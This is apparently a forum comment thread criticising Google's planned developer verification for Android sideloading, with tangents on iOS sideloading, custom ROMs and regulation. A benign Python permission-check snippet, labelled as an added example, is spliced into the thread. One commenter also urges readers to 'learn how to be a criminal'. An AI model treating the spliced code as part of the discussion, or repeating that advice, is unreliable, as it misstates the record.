They've been chipping away at this over the years. Safetynet was the first offense, but if they start restricting app installation from sources of my choice (I hate the term "sideloading"), there's not much advantage left.
Google doesn't make better phones, they were just less hostile to the consumer. That seems to be going away :(
And saying that for me anyways the only reason I have an Android and not an IPhone is because they were less abusive. On unrelated metrics like hardware quality Apple generally seems to do better.
I have a stroke every time I try to navigate settings on an iPhone each time someone asks. It's like they don't want you to try and change anything, ever.
And the person you're responding to was pretty clear that the issue is, if they both do the same thing, Google has no edge in devices.
The thing is that if Google chooses to make Android OS as closed as iOS, I'd rather use an iPhone than an Android phone...
Leaving Google for Apple, and expecting a more open app store, is going to be disappointing. I’m not a Google fanboy by any means, just pointing out the landscape out there
By itself, this throttling is a good thing and keeps phones usable for longer, because a phone that is slow is better than a phone that randomly reboots.
The problematic part was that they a) didn't disclose it, and b) did this for phones within the warranty period, so instead of the phone visibly crashing and you returning the obviously broken phone, it just lost performance which you might not have noticed in time to get a free replacement.
> XDA user XCnathan32, along with assistance from two other users, created the fix and put it up for anyone to give it a whirl. Without getting too technical, the fix shuts down all four of the Nexus 6P octa-core Snapdragon 810 processor’s performance cores that seemingly prevent the phone from properly booting
https://www.androidauthority.com/nexus-6p-bootloop-fix-78930...
It wasn’t a guise, it actually increased the battery life quite much. People complained about the battery of old phones. The problem was that users did not have a choice to opt out.
Apple wouldn't have had to do all the song and dance if from the start a popup warned the users their battery lost capacity and should be serviced.
It's not about 'saving battery', it's about preventing undervoltage that janks everything up.
Having dealt with more than one windows phone that didn't have this feature or had it in a bad way (i.e. 520/521 would just 'reboot', 640 and 950XL would just kill an app) I wish Microsoft would have figured that crap out lol.
Nope. There was an issue in iPhones and Nexus phones that had been used for a few years where a worn battery could no longer maintain a voltage high enough to meet instantaneous SOC power demand, resulting in unexpected device shut downs.
Apple got the device to quit shutting off without warning by throttling older devices and Google did nothing and just told users to buy a new device.
They both got sued, and both lost.
> If you currently or formerly owned a Google Nexus 6P smartphone, we have some good news: you might be eligible for a cash rebate for those bootloops and spontaneous shutdowns the device was known for.
https://www.androidauthority.com/nexus-6p-lawsuit-2019-97547...
I've said this before, but it was the right idea executed the wrong way. iPhones give you a warning when they overheat, and this throttling should have gotten a similar warning with a link to an FAQ explaining the battery dynamics.
That’s not a true story.
You can also use an enterprise developer certificate that lasts forever but if Apple revokes it then the app stops working until you get another working cert.
It does require you to turn on iOS developer settings by connecting to a Mac with Xcode installed to enable but then you can manage app installation and refreshing via an App Store like Alt Store. The EU has a different system where there is no limit on the amount of sideloadable apps but the apps still need to be approved by Apple. Alt Store also has an EU-specific App Store for that purpose.
I side loaded on iOS for a long time. Get Youtube++ for ad free and I forget the Reddit client I used that was side loaded as well. You can run the server on any PC or Mac that will handle side loaded apps and being on the same WiFi network allows the server to automatically refresh the installed apps. Only big downside is updates are not automatic or simple. To update an app you have to download the new app .ipa and then sign it like you were installing it fresh. Usually it picks up the existing configs and data though. So it's not a full app wipe.
The sideloaded subreddit is where I got into it through.
Otherwise, I think it's possible to use developer tools to temporarily install apps on an iPhone. IIRC this requires a Mac and has to be repeated every few days.
7 days for free account.
1 year for paid (until membership ends?).
90 days for TestFlight.
* Only in europe
** kinda
*** you have to enable it in your account settings
**** you have to reinstall it every 30 days
***** more I forgot
****** fuck you - apple
The issue is that the good news are often incremental, while the bad news come in large steps, which makes them much more noticeable.
Just yesterday I got a venmo prompt to add biometrics for "security". F off.
It is, however, to make you use Venmo more easily, thus more often, thus spend more money through them.
https://support.google.com/googleplay/android-developer/thre...
The busybox/toybox case looks especially relevant and interesting:
> In January 2012 the proposal of creating a BSD license alternative to the GPL licensed BusyBox project drew harsh criticism (…). Rob Landley, who had started the BusyBox-based lawsuits, responded that this was intentional, explaining that the lawsuits had not benefited the project but that they had led to corporate avoidance, expressing a desire to stop the lawsuits "in whatever way I see fit".
source: https://en.m.wikipedia.org/wiki/Toybox
Such a shame that the Free Software Foundation has been such an awful steward of the GPL. The fact that the GPLv3 didn't close the network hole is a decision made either out of myopia or abject cowardice, you shouldn't need a separate license (AGPLv3) to ensure true freedom of the codebase.
It seems to me that most of the users do not care much about what kind of software their phone runs, unfortunately. As long as it works with Instagram or whatever other big brand social media is trending these days, they are happy. Which is I think understandable.
The companies developing the apps are in my opinion driving this cultural shift. And they are doing it mostly because it brings them commercial advantages. Which is, I think, also understandable.
Everyone involved seems to do what appears to be in their best interest. And yet, collectively, we as a society get a worse outcome overall. This phenomenon perhaps has a name.
In order to break out of it, I think that the incentives on both sides need to be adjusted. It needs to be in the companies' interest to produce apps as open source. And the users need to want them.
The only way I can think of to achieve that kind of a change is when the open source apps and products become just inherently better than their proprietary alternatives. In all categories. Then, the people would want them. And then the companies will start to produce them.
It is a very tough goal. The commercial apps do not have to be better in all categories to retain their users. They can use vendor locks or other business strategies which restrict the users' ability to leave them.
Open source apps cannot do such things. The only fair ground on which they can compete is their quality.
I am gonna start carrying around a laptop with a 5G modem instead.
Really though, it doesn’t have enough impact for consumers. If I get unfairly banned as a developer, no one even notices because that’s nothing more than an opportunity for another developer to step in.
Individually we have no power :-(
> You shouldn’t have to choose between open and secure
2+2=5
Truly the end of an era. I've spent nearly two decades buying Android phones because of a single checkbox in settings that let me have the freedom I consider essential to any computing device that I own.
In a way, it's liberating, I've missed out on a lot from the Apple ecosystem because of that checkbox. Maybe finally I can let go of it now the choice is out of my hands.
[0] https://android-developers.googleblog.com/2025/08/elevating-...
It looks like many in this thread are against, but I don't see suggestions for action?
PDAs, now... have a look at https://www.clockworkpi.com/home-uconsole
Also, due to the cost of physical media piracy was rampant even amongst boomers. People knew and had the option to buy a dvd player that could play video cd because that’s how movies were ripped.
Even during the early iPhones we were so stripped of even basic features that a jailbreak was 100% required if you wanted to do even basic things like taking videos or changing the Home Screen background.
None of this is necessary anymore. The user gets the phone and it just works from their perspective at least.
So who is going to try to run a business off of nerds like us who want to have this sort of control over our devices (I’d call it freedom but the average user doesn’t feel unfree)?
I am both happy (from a user-friendliness point of view) and sad (from a "works offline" perspective) that F-Droid's share button now shares a link that will show them info about the app with an option to install the software, instead of the share button directly giving you an APK file with no way to copy the 'store' page. I'd personally still know how to send people APKs via hotspot or bluetooth (such as for peer-to-peer voice/message apps) but a lot of people won't
This move from sending each other software to sending each other links to centralized platforms has been long ongoing. Most messaging systems don't allow you to send executable (.exe, .apk, .sh, etc.) files anymore. And I believe that virtually all of them individually do it for your own good, but the combined result is a societal shift
Where a less restricted device can do cool things nobody else can do.
If someone made a screenless powerbank-shaped Android device, I might be interested. The device would double as a 5g wifi modem, and to access the UI you'd remote in over VNC from a laptop, or unrestricted mobile device like a PinePhone.
As to the device you mention, it should be possible to take a phone apart and spoof* all of the mics and cameras, likely the GPS, and haptic motor and speakers as well, and have a 5g touch screen modem with plain internet, or keep the speakers and it's a media device, or put all the audio on a micro switch.
* Use matched resistors, or black out the sensors; detach the antenna for GPS.
Let's just say I really don't like being advertised to.
At least most of the world has until 2027 to install LineageOS or GrapheneOS.
I’m not saying I have a solution but looking at yourself and pretending it’s all fine because you’re 10 times more tech savvy than the average citizen isn’t a viable answer. That kind of issue must be solved by regulation, hopefully Europe gets to bring back on earth whoever at Google agreed on that idea.
The "normies" won't protest because it mostly doesn't affect them, at least not in any direct and obvious way that would trigger a pushback.
Regulation is unlikely to give you what you want. For one thing, regulators love centralization in general because it makes it much easier to regulate - when there are only a few large players, you can write the laws around them, effectively forcing them to be the enforcers. A large and diverse field where users can install whatever apps from wherever is much harder to regulate wrt things like banning porn or violent games or whatever it is that "normies" feel upset and demand that SOMEONE DO SOMETHING ABOUT IT!!!1! today.
This isn't to say that you shouldn't try to use political tools. Just be very clear that what you're trying to achieve is a minority take, and therefore you're unlikely to actually reach the goal in a democracy; at best, you will move the needle very slightly.
So, if you want to actually enjoy freedom in the meantime, learn how to be a criminal.
Which only work on a tiny, almost insignificant sub-set of phones. If you don't have one of those, you're screwed.
Not to mention the bootloader is getting locked down so you can't even install one of these in the first place.
[1] https://news.ycombinator.com/item?id=41895718
What someone needs to do is create a "Store" browser that loads apps from random websites like https://site.tld/app.apk
You could manually parse AndroidManifest.xml and allow only apps that expose <uses-permission android:name="android.permission.INTERNET" />
I'm somewhat interested in doing this myself actually. What do people think?
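One way to sketch the manifest check proposed in the comment above, as an added example that is not part of the thread. It assumes the manifest has already been decoded to text XML (inside an APK it is stored as binary XML) and reads "allow only apps that expose INTERNET" as "reject any app that requests a permission outside an allowlist"; the function names, the allowlist and the sample manifests are constructed for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = "{%s}name" % ANDROID_NS
# Both elements request permissions; the second applies on API 23+ only.
PERMISSION_TAGS = ("uses-permission", "uses-permission-sdk-23")

# Hypothetical store policy (assumption): network access and nothing else.
ALLOWED = frozenset({"android.permission.INTERNET"})


def requested_permissions(manifest_xml):
    """Return the set of permission names a decoded manifest requests."""
    # A manifest needs no DTD; refusing one blocks entity-expansion tricks
    # in a file fetched from an untrusted site.
    if "<!DOCTYPE" in manifest_xml or "<!ENTITY" in manifest_xml:
        raise ValueError("manifest contains a DTD")
    root = ET.fromstring(manifest_xml)
    if root.tag != "manifest":
        raise ValueError("root element is not <manifest>")
    found = set()
    for tag in PERMISSION_TAGS:
        for elem in root.iter(tag):
            name = elem.get(NAME_ATTR)
            if not name:
                raise ValueError("<%s> without android:name" % tag)
            found.add(name)
    return found


def check_manifest(manifest_xml, allowed=ALLOWED):
    """Return (ok, denied); fail closed if the manifest cannot be parsed."""
    try:
        denied = requested_permissions(manifest_xml) - set(allowed)
    except (ET.ParseError, ValueError) as exc:
        return False, ["unparseable: %s" % exc]
    return not denied, sorted(denied)


# Constructed sample manifests (not taken from any real app).
HEAD = '<manifest xmlns:android="%s" package="com.example.demo">' % ANDROID_NS
NET_ONLY = HEAD + (
    '<uses-permission android:name="android.permission.INTERNET"/>'
    '<application/></manifest>')
GREEDY = HEAD + (
    '<uses-permission android:name="android.permission.INTERNET"/>'
    '<uses-permission android:name="android.permission.READ_CONTACTS"/>'
    '<uses-permission-sdk-23 '
    'android:name="android.permission.ACCESS_FINE_LOCATION"/>'
    '<application/></manifest>')

if __name__ == "__main__":
    for label, xml in (("net-only", NET_ONLY), ("greedy", GREEDY)):
        print(label, check_manifest(xml))
```

The check covers declared permissions only; it says nothing about who signed the APK or what the code does with the access it has.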
Don't be evil Google!
Whose smart idea was that.
Isn't this a death knell for F-Droid, at least for running on most hardware? Since they require their own builds/attestation?
The Overton Window for computing keeps inching towards gatekeepers having total control over devices. I can't help but imagine myself lurching along on the last somewhat open hardware I can cobble together in a couple of decades, because I refuse to drink the verification can to continue...
It feels as if that would provide far more of a public service than this... whatever this is.
Are there stats on whether more malware and financial scams come from installed apps or from advertising?
We do not know yet who will be considered "hobbyist". I would say they might check the user base. When hitting an app installation threshold of, let's say, 1,000 users, they will force you to pass the full legal check. Otherwise they will start blocking any further installations.
> Verify your identity
> * You will need to provide and verify your personal details, like your legal name, address, email address, and phone number.
> * If you're registering as an organization, you'll also need to provide a D-U-N-S number and verify your organization's website.
> * You may also need to upload official government ID.
Only one of those three applies to organizations.
>A note for student and hobbyist developers: we know your needs are different from commercial developers, so we’re creating a separate type of Android Developer Console account for you.
Nothing about it says anything about having lighter requirements, just not going through a Play Console link. Even if the requirements end up being "lighter", the minimum will always be at least "link a Google account", which is already a massive privacy breach.
> It also doesn't prevent you from side loading.
It absolutely does. Quoting from Google:
>Starting next year, Android will require all apps to be registered by verified developers in order to be installed by users on certified Android devices.
certified Android devices being... 99.9% of all Android devices in existence.
https://android-developers.googleblog.com/2025/08/elevating-...
It's not a massive privacy breach. If you are so anti-Google yet use their devices then most likely you're already only distributing to GrapheneOS or LineageOS anyway. For most people who already have a Google account this is a very small bar to clear.
Getting a DUNS number is ass, getting the 20 testers is ass, etc etc.
I do not want to give Google my government ID to write a shitty little app that only my family will use, or only close friends use and it gets sideloaded through sending it on chat. I do not want people making apps to skip ads on YouTube giving out their government ID. I do not want people making apps that might get them in trouble with their government to give out their government ID to Google.
Hong Kong protestors bought Android phones en masse when Apple removed apps they used to fight back on Chinese censorship, if Google is allowed to do the same you can say goodbye to freedom of information in many countries. You’re focusing on revanced when it’s the least of the issue.
https://calyxos.org/news/2025/08/01/a-letter-to-our-communit...
It does have an Android subsystem stuck on, but it's not necessary.
Ok, but what's the real damage? In other words, how many installs and how much money siphoned from users and legit apps?
"You'll need to prove you own your apps by providing your app package name and app signing keys."
That is capital-I Insane.
[1] https://developer.android.com/developer-verification
Someone elsewhere in the thread said this is how F-Droid works, but I can't confirm firsthand.
The only credible explanation I can come up with is that they need the keys in order to produce indistinguishably backdoored versions of applications, handy for tools like Signal.
Otherwise one would never think of requesting the private keys -- if Google wants to rebuild apps themselves they could sign with their own keys, and possessing anyone else's private key is just pure liability, as if there is any discovered abuse they can't show that they weren't the vector.
I'm cancelling my Pixel 10 preorder.
One thing that annoys me is that a lot of F-Droid apps are obviously naive ports with overbroad permissions like "can read the entirety of storage", but that's still better than the all-consuming Goo.
"Would?" Google has zero incentive to do that.
Will there be a local override?
GrapheneOS won't survive the next generation of devices because bootloader unlocking will also go away (https://news.ycombinator.com/item?id=44765939), and without kernel security updates that OS can't continue.
Now there's also no more sideloading, so what purpose does Android even serve anymore?
The comment in the thread you linked directly contradicts the claim that "bootloader unlocking will also go away".
iOS does a tremendous amount of data collection including for the usage of ads as per Apple's privacy policy. All the same types of data that stock Android collects, even.
You may believe Apple is a generally better steward of that data than Google, but using iOS does not reduce the amount of data being hoovered up in any meaningful capacity.
> Now there's also no more sideloading, so what purpose does Android even serve anymore?
I hate this change, but I still prefer Android. iOS is hardly perfect nor does it do everything better...
Can you download, build, and install a basic Android system these days without touching a single piece of closed code? Absolutely. Will it be able to do much without closed binaries? No.
Android isn't GNU/Linux where there's a general ethos of making everything in userland FOSS if at all possible. Rather, it's a free OS that both Google and manufacturers can do anything they want with, including shove a ton of spy and bloatware on it, then make it to where you can't get rid of those things, at least not easily.
The optimism from 15 years ago surrounding FOSS in the mobile space is on its deathbed.
Because Google-free AOSP-derived Android distributions are far more versatile, offer far more freedom, impose far fewer restrictions and tend to end up being far less expensive than whatever the fruit factory decides their dedicants have to use today. If Google goes the way of the fruit folks and AOSP no longer offers these freedoms the next step is not to surrender to the Church of Apple but to find a way to evade those restrictions.
I’m hoping that projects like Precursor can take off because we’ve buried ourselves in such a mountain of complexity that it seems like only a billion/trillion dollar big tech company can make an OS.
But then again, somebody called BS on browsers and we might have a good option soon in Ladybug!
https://www.crowdsupply.com/sutajio-kosagi/precursor
Google don't even expose a per-app toggle for app Internet access, why am I surprised?
This is disgusting.
Freedom died a little bit more today.
Why is end-user choice and consent not considered?
It's really disturbing that the EU and Google would do this.
I can't recommend Android or iPhone because of this nonsense.
The elimination of user choice was very much considered. In fact, it's the primary goal.
I think that is a yes, it will affect Samsung
> our recent analysis found over 50 times more malware from internet-sideloaded sources than on apps available through Google Play.
I will believe this when we stop seeing brazen malware in marquee app store apps, e.g. https://www.tracesecurity.com/blog/articles/meta-pixel-and-t...
Personally: I don't use Apple because I like being able to whip together little apps to side-load without having to check in with a walled-garden mothership. If Google is going to move closer to Apple in that regard... Apple's UX ecosystem is better, so I have far fewer reasons to keep using Android.
Damn the future sucks ass.
Alternatively, and that’s almost bullshit, the dumb phone trend continues and we might get devices like PDAs. Get a dumb phone and a small camera and then your PDA for everything that is essentially an app. Not sure what OS they’d run but I don’t see another way.
As long as they still allow running stuff inside of apps like that I will probably not abandon ship yet.
If they keep up this "boil the frog slowly" crap though, I may be migrating off of Android and over to a strictly Linux-based phone, like a PinePhone, Librem, etc.
Fuck the scumbags at the top of big tech making decisions like these.
I have no words.. or more precisely, those words are not the kind of words I'm allowed to write here.
[1] https://github.com/popcorn-official/popcorn-android
"Developers will have freedom" yet they are entitled to Google’s verification.
It’s just another stone in the grave of Android and even though I shipped off this sinking ship 6 years ago to iOS, this is still concerning because ultimately Apple’s iOS is in competition solely with Android.
If Android gets so bad it has all the disadvantages of iOS, some more, for instance with the embedded spyware that manufacturers are paid to include, and none of the good sides of iOS, then everyone loses. Apple doesn’t have to compete anymore, they just have to not suck.
With a free Apple ID (no additional registration needed) you can also install your compiled iOS app on your iPhone and have it working for 7 days before you need to re-install it.
was a reason I bought Android. will they be sending me a refund?
This combined with the 'age verification' coming to all Google properties means it is a very small step from that new world to full Google verification of everything you visit and everything on your device, at any time, for any reason with the penalty being incontestable ban from your device, apps and data.
Get ready for Facebook-style 'we are interrupting you for a video selfie because we have detected you are a threat' across all Google properties (Android, Chrome, Gmail, Maps...).
Move to Linux phones, now.
- money
- tickets
- identification
They cannot force everyone to own and buy a phone.
> Starting next year, Google will begin to verify the identities of developers distributing their apps on Android devices, not just those who distribute via the Play Store.
Odd little phrase, "distributing their apps on Android devices".
I think "distributing" in this context is in the sense of product distribution, not in the sense of distributed systems.
But "distributing...on" sounds a little odd, like Google is still providing a distribution service. (Contrary to all the precedent of how we've thought of installing software, other than the proprietary, captive-user app stores.)
And so, maybe "distributing...on" makes it sound more like Google is (once again) entitled to gatekeep what you can run on your device/computer.
> However, developers who appreciated the anonymity of alternative distribution methods will no longer have that option. Google says this will help to cut down on bad actors who hide their identity to distribute malware, commit financial fraud, or steal users’ personal data.
Maybe it's not "developers who appreciated the anonymity" (which we immediately try to conflate with bad actors), but that the whole point lately has been to stop the greedy proprietary lock-in app store monopolies, and not have them gatekeeping what everyone else can do.
I doubt I'll move away from Android too soon, but that definitely makes me reconsider whether any Google services have a right to CPU time on my device.
More and more locked down devices, Android source releases only being published once a year, device drivers for reference devices disappearing, and now, verification of all your software for your "security". The war on general computing is well and truly on.
What the absolute fuck.
It’s sad that smartphones now hold so much personal and private data but aren’t really under the control of their users.
They already have a version of that - it's called Windows S Mode (Windows Store apps only, no EXEs or scripts, Edge only for browsing). If they get away with it, they would make it the default. Required Microsoft accounts was a step in that direction.
It will happen. We've been the frogs boiled in the pot for years, accepting forced attestation. Eventually they'll close off running unsigned code, and the PCs will probably have bootloaders locked to Windows as well, so you can't escape.
I find it hard to state how contemptible this is. How stupid. Everyone who worked on this has blood on their hands.
Break them up already, it's getting old.
Not even to mention the H-1B Indian kickback stuff that's about to hit them. Couldn't happen to a nicer company.
What a fucking joke.
In my case I keep a copy of K9 Mail 5.6 with the original UI (the reason I choose K9) and I sideload it to every device of mine. I'm afraid that I'll have to register an account and what, claim that that K9 is mine?
Apple implemented a similar change for the EU App Store earlier this year to comply with the Digital Services Act (DSA), a regulation that now requires app developers to provide their “trader status” to submit new apps or app updates for distribution.
For the record, Apple notes that the DSA requirements only impact developers distributing through the App Store, not through alternative distribution [1].
[1]: https://developer.apple.com/help/app-store-connect/manage-co...
I.e. it doesn't require this at all, it merely requires Google require verification for apps that they themselves distribute. What they've been doing all along until now plus or minus minor bookkeeping details on what data they collect.
That is most apps - but not the kind of apps Google is attacking here (personal-scale, actually-free, third-party, etc.). And "apps that are not monetized" is actually a very nice thing to filter for from a user perspective.
Of course, the world's largest malware vendors love to use government action as an excuse to do something else malicious.
Users should be allowed to brick their device if they're sufficiently stupid, but I feel bad for Google who has to deal with some of those people blaming them.
To whatever extent Google may be responding to an issue arising from the market, it is likely at the behest of large companies, especially payment processors, payment card networks, banks, etc. These institutions lately have begun to exert increasing influence over end-user activities, and it would not surprise me if they are playing a part here, too.
My position is that this is not the OS vendor's responsibility to prevent. A warning is fine. A scan for known malware by default is fine. Beyond that, it's my device and it's my choice to get software from wherever I damn well please even if it might be a bad idea.
The biggest difference these days is most folks don't even use a personal computer.
And besides, if you really want to combat fraud, stop using credit cards for fuck's sake and make a modern payment system that doesn't rely on 1970s technology.
This "trust me bro, our App Store is safer" is just getting on my nerves. Every day we get malware popping up on both app stores.
Time to switch